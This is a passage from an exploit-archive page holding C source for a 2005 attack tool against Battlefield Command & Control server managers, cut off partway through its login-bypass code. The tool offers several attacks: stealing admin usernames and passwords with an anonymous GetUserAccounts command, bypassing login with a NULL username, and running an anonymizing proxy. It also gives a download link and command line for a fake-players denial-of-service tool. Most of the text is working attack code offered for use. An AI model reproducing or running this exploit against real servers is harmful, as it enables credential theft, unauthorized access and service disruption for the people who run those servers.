[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Battlefield (BFCC/BFVCC/BF2CC) Login Bypass/Pass Stealer/DoS Exploit
# Published : 2005-08-29
# Author : Luigi Auriemma
# Previous Title : MS Windows Plug-and-Play Service Remote Universal Exploit (spanish fix)
# Next Title : Mozilla Firefox <= 1.04 compareTo() Remote Code Execution Exploit
/*
by Luigi Auriemma
http://aluigi.altervista.org/fakep/tcpfp.zip
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdarg.h>
#ifdef WIN32
#include <winsock.h>
/*
Header file used for manage errors in Windows
It support socket and errno too
(this header replace the previous sock_errX.h)
*/
#include <string.h>
#include <errno.h>
void std_err(void) {
char *error;
switch(WSAGetLastError()) {
case 10004: error = "Interrupted system call"; break;
case 10009: error = "Bad file number"; break;
case 10013: error = "Permission denied"; break;
case 10014: error = "Bad address"; break;
case 10022: error = "Invalid argument (not bind)"; break;
case 10024: error = "Too many open files"; break;
case 10035: error = "Operation would block"; break;
case 10036: error = "Operation now in progress"; break;
case 10037: error = "Operation already in progress"; break;
case 10038: error = "Socket operation on non-socket"; break;
case 10039: error = "Destination address required"; break;
case 10040: error = "Message too long"; break;
case 10041: error = "Protocol wrong type for socket"; break;
case 10042: error = "Bad protocol option"; break;
case 10043: error = "Protocol not supported"; break;
case 10044: error = "Socket type not supported"; break;
case 10045: error = "Operation not supported on socket"; break;
case 10046: error = "Protocol family not supported"; break;
case 10047: error = "Address family not supported by protocol family"; break;
case 10048: error = "Address already in use"; break;
case 10049: error = "Can't assign requested address"; break;
case 10050: error = "Network is down"; break;
case 10051: error = "Network is unreachable"; break;
case 10052: error = "Net dropped connection or reset"; break;
case 10053: error = "Software caused connection abort"; break;
case 10054: error = "Connection reset by peer"; break;
case 10055: error = "No buffer space available"; break;
case 10056: error = "Socket is already connected"; break;
case 10057: error = "Socket is not connected"; break;
case 10058: error = "Can't send after socket shutdown"; break;
case 10059: error = "Too many references, can't splice"; break;
case 10060: error = "Connection timed out"; break;
case 10061: error = "Connection refused"; break;
case 10062: error = "Too many levels of symbolic links"; break;
case 10063: error = "File name too long"; break;
case 10064: error = "Host is down"; break;
case 10065: error = "No Route to Host"; break;
case 10066: error = "Directory not empty"; break;
case 10067: error = "Too many processes"; break;
case 10068: error = "Too many users"; break;
case 10069: error = "Disc Quota Exceeded"; break;
case 10070: error = "Stale NFS file handle"; break;
case 10091: error = "Network SubSystem is unavailable"; break;
case 10092: error = "WINSOCK DLL Version out of range"; break;
case 10093: error = "Successful WSASTARTUP not yet performed"; break;
case 10071: error = "Too many levels of remote in path"; break;
case 11001: error = "Host not found"; break;
case 11002: error = "Non-Authoritative Host not found"; break;
case 11003: error = "Non-Recoverable errors: FORMERR, REFUSED, NOTIMP"; break;
case 11004: error = "Valid name, no data record of requested type"; break;
default: error = strerror(errno); break;
}
fprintf(stderr, "nError: %sn", error);
exit(1);
}
// inserted winerr.h /str0ke
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define PORT 5555
#define MYPORT 3333
#define BUFFSZ 8192
#define DEL 0x1e
#define END "x00x40x40x00"
void proxy(int sock, u_char *buff, int size);
int check_drop(u_char *data);
void show_bfcc(u_char *buff, int len);
void send_bfcc(int sock, ...);
int recv_bfcc(int sock, u_char *buff, int size);
u_int resolv(char *host);
void std_err(void);
int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len,
attack,
scan = 3;
u_short port = PORT;
u_char buff[BUFFSZ];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("n"
"BFCommand & Control login bypass "VER"n"
" BFCC <= 1.22_An"
" BFVCC <= 2.14_Bn"
" BFVCCDaemon is NOT vulnerablen"
"by Luigi Auriemman"
"e-mail: aluigi@autistici.orgn"
"web: http://aluigi.altervista.orgn"
"n", stdout);
if(argc < 3) {
printf("n"
"Usage: %s <attack> <host> [port(%hu)]n"
"n"
"Attack:n"
" 1 = passwords stoler, sends the GetUserAccounts anonymously and gets all then"
" usernames and passwords in the server manager (bug A)n"
" 2 = checks if is possible to bypass the login using a NULL username (bug B)n"
" 3 = proxy server to use with BFC3 and BFVC3 clients which grants access to anyn"
" vulnerable server in total anonymity and unbootable (bug A and C)n"
" 4 = explanation of how test bug D, server full forevern"
"n"
" Note: The default port of BFCC is 4555 while is 5555 for BFVCC (default)n"
" This tool has been written to be compatible with BFVCC so only attack 1n"
" and 4 can be used with success versus BFCC using this specific tooln"
"n", argv[0], port);
exit(1);
}
attack = atoi(argv[1]);
if((attack < 1) || (attack > 4)) {
fputs("nError: you must choose a number between the range of available attacksnn", stdout);
exit(1);
}
if(attack == 4) {
fputs("n"
"Download the tool "Generic TCP Fake Players DoS" from here:n"
"n"
" http://aluigi.altervista.org/fakep/tcpfp.zipn"
"n"
"Launch it with the following argumentsn"
"n"
" tcpfp -r full 127.0.0.1 5555n"
"n"
"substituiting 127.0.0.1 and 5555 with the server and port of the server youn"
"want to test.n"
"n", stdout);
return(0);
}
if(argc > 3) port = atoi(argv[3]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
while(scan--) {
printf("- target %s : %hun",
inet_ntoa(peer.sin_addr), port);
len = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
if(!len) break;
fputs(" no service available on this portn", stdout);
peer.sin_port = htons(++port);
}
if(len < 0) std_err();
if(attack == 1) {
fputs("- receive server's informations:n", stdout);
len = recv_bfcc(sd, buff, BUFFSZ);
show_bfcc(buff, len);
fputs("- send anonymous GetUserAccounts commandsn", stdout);
send_bfcc(sd, "GetUserAccounts", NULL);
fputs(
"- receive full list of admin usernames and passwordsn"
" Username Password:n", stdout);
len = recv_bfcc(sd, buff, BUFFSZ);
show_bfcc(buff, len);
} else if(attack == 2) {
fputs("- receive server's informations:n", stdout);
len = recv_bfcc(sd, buff, BUFFSZ);
show_bfcc(buff, len);
fputs("- send login command with NULL nicknamen", stdout);
send_bfcc(sd,
"login",
"